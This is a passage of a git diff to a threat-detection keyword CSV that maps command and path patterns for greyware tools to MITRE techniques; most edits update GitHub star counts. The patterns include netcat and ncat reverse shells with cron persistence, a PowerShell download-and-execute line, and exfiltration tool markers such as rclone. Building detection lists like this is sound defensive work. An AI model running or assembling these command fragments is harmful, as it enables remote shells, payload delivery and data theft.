diff --git a/greyware_tool_keyword.csv b/greyware_tool_keyword.csv index ad4e7f4b8..f79e1c4f4 100644 --- a/greyware_tool_keyword.csv +++ b/greyware_tool_keyword.csv @@ -1,15 +1,15 @@ "keyword","metadata_keyword_type","metadata_tool","metadata_description","metadata_tool_techniques","metadata_tool_tactics","metadata_malwares_name","metadata_groups_name","metadata_category","metadata_link","metadata_enable_endpoint_detection","metadata_enable_proxy_detection","metadata_comment","metadata_severity_score","metadata_popularity_score","metadata_github_stars","metadata_github_forks","metadata_github_updated_at","metadata_github_created_at" -"* --coin=monero*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"* --coin=monero*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" "* /bin/nc * -e /bin/bash* > cron && crontab cron*","greyware_tool_keyword","nc","Linux Persistence Shell cron","T1053 - T1037","TA0003","N/A","N/A","Persistence","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "* /bin/nc * -e /bin/bash*> * crontab cron*","greyware_tool_keyword","nc","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "* /c sc query WinDefend*","greyware_tool_keyword","sc","Get information about Windows Defender service","T1518.001 - T1049","TA0007 - TA0009","N/A","N/A","Discovery","https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "* -accepteula -nobanner -d cmd.exe /c *","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling lateral movement. privilege escalation. or the execution of malicious payloads.","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Exploitation Tools","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"* --coin *--nicehash *","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"* --coin *--nicehash *","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" "* dclist *","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* denied AXFR from *","greyware_tool_keyword","dns","Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"* denied AXFR from *","greyware_tool_keyword","dns","Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" "* dir /s */ Microsoft.ActiveDirectory.Management.dll*","greyware_tool_keyword","dir","threat actors searched for Active Directory related DLLs in directories","T1059 - T1083 - T1018","A0002 - TA0009 - TA0040","N/A","N/A","Discovery","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* dropping source port zero packet from *","greyware_tool_keyword","dns","Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" -"* exiting (due to fatal error)*","greyware_tool_keyword","dns","Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"* dropping source port zero packet from *","greyware_tool_keyword","dns","Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"* exiting (due to fatal error)*","greyware_tool_keyword","dns","Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" "* -f *.dmp windows.cmdline*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* -f *.dmp windows.dlllist --pid *","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* -f *.dmp windows.filescan*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" @@ -35,11 +35,11 @@ "* -Ix64 *.bin -Ix86 *.bin -P Local -O *.xsl -url http* -delivery xsl -stageless*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -Ix64 *.c -Ix86 *.c -P Local -O *.js*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -Ix64 *.vba -Ix86 *.vba -P Inject -O *","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" -"* -jar ipscan.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"* -jar ipscan.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" "* -m SimpleHTTPServer *","greyware_tool_keyword","simplehttpserver","quick web server in python","T1021.002 - T1059.006","TA0002 - TA0005","N/A","N/A","Data Exfiltration","https://docs.python.org/2/library/simplehttpserver.html","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "* ncat * -e /bin/bash*|crontab*","greyware_tool_keyword","ncat","reverse shell persistence","T1059.004 - T1053.005 - T1059.005","TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "* netscan.exe *","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" -"* --nicehash *--coin *","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"* --nicehash *--coin *","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" "* process call create *cmd.exe /c powershell.exe -nop -w hidden -c *IEX ((new-object net.webclient).downloadstring('https://*","greyware_tool_keyword","wmic","Threat Actors ran the following command to download and execute a PowerShell payload","T1059.001 - T1059.003 - T1569.002 - T1021.006","TA0002 - TA0005","N/A","N/A","Collection","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* py2exe*","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","0","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z" "* -sc trustdump*","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -49,20 +49,20 @@ "* -stageless -Ix64 *.bin -Ix86 *.bin -P Local -O *.js*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -stageless -Ix64 *.bin -Ix86 *.bin -P Local -unhook -O *.js*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* where /r C:\Windows\WinSxS\ *Microsoft.ActiveDirectory.Management.dll*","greyware_tool_keyword","where","threat actors searched for Active Directory related DLLs in directories","T1059 - T1083 - T1018","A0002 - TA0009 - TA0040","N/A","N/A","Discovery","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*%COMSPEC%*echo*\pipe\*","greyware_tool_keyword","echo","Detects the use of getsystem Meterpreter/Cobalt Strike command. Getsystem is used to elevate privilege to SYSTEM account.","T1068.003 - T1078.002","TA0004 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1943","2023-10-03T04:55:17Z","2016-12-24T09:48:49Z" +"*%COMSPEC%*echo*\pipe\*","greyware_tool_keyword","echo","Detects the use of getsystem Meterpreter/Cobalt Strike command. Getsystem is used to elevate privilege to SYSTEM account.","T1068.003 - T1078.002","TA0004 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" "*%SystemRoot%\\MEMORY.DMP*","greyware_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" -"*&& telnet * 2>&1 &1 &3 2>&3*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1943","2023-10-03T04:55:17Z","2016-12-24T09:48:49Z" +"*.rclone.exe config*","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","6","10","40586","3718","2023-10-04T20:39:19Z","2014-03-16T16:19:57Z" +"*/AppFiles/ipscan.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*/bin/sh | nc*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" +"*/bin/sh -i <&3 >&3 2>&3*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" "*/FreeFileSync.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*/FreeFileSync_*_Windows_Setup.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*/FreeFileSyncPortable_*.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","9","10","N/A","N/A","N/A","N/A" @@ -151,10 +151,10 @@ "*/github.com/*/raw/main/*.zip*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*/GoodSync-vsub-Setup.exe*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*/http-put-server.py*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*/ipscan.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","1","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" -"*/ipscan_*_amd64.deb*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" -"*/ipscan2-binary/*.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" -"*/ipscan-any-*.jar*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*/ipscan.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","1","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*/ipscan_*_amd64.deb*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*/ipscan2-binary/*.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*/ipscan-any-*.jar*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" "*/Ivy/Cryptor*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","1","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*/Ivy/Loader/*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","1","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*/keygen.exe*","greyware_tool_keyword","_","generic suspicious keyword keygen.exe observed in multiple cracked software often packed with malwares","T1204 - T1027 - T1059 - T1055 - T1060 - T1195","TA0005 - TA0002 - TA0011","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -165,7 +165,7 @@ "*/netscan_linux.tar.gz*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*/netscan_portable.zip*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*/netscan_setup.exe*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","8","10","N/A","N/A","N/A","N/A" -"*/netshrun.c*","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","1","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/netshrun.c*","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" "*/nmap-nse-scripts*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*/nmap-scada*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*/nmap-vulners*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" @@ -178,12 +178,12 @@ "*/RealTimeSync.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*/s4n7h0/NSE*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*/spacerunner.exe*","greyware_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" -"*/updog-*.tar.gz*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2653","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" -"*/updog.git*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2653","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" -"*/updog/archive/updog-*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2653","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" -"*/xmrig-*-gcc-win64.zip*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*/xmrig.exe*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*/xmrig.git*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*/updog-*.tar.gz*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*/updog.git*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - 